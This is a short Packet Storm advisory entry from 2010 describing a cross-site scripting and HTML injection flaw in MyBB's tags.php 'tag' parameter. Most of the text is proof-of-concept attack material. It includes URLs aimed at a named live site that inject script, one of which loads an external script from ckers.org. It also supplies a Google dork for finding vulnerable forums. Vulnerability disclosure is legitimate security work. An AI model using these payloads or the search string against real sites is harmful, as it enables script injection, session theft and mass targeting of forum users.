MyBB Cross Site Scripting

2010-12-13T00:00:00
ID PACKETSTORM:96658
Type packetstorm
Reporter TEAMELITE
Modified 2010-12-13T00:00:00

Description

                                        
                                            `MyBB all version (tags.php?tag=) - Cross-Site Scripting (XSS) & HTML  
Injection  
  
http://www.mybb.com  
  
12-12-2010  
  
  
Poc: http://infectionsupport.com/tags.php?tag=  
"><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://infectionsupport.com/tags.php?tag="><script src%3d//ckers.org/s  
></script>  
  
Google dork: powered by mybb inurl:tags.php?tag=  
  
  
by Teamelite (Methodman) http://nemesis.te-home.net  
`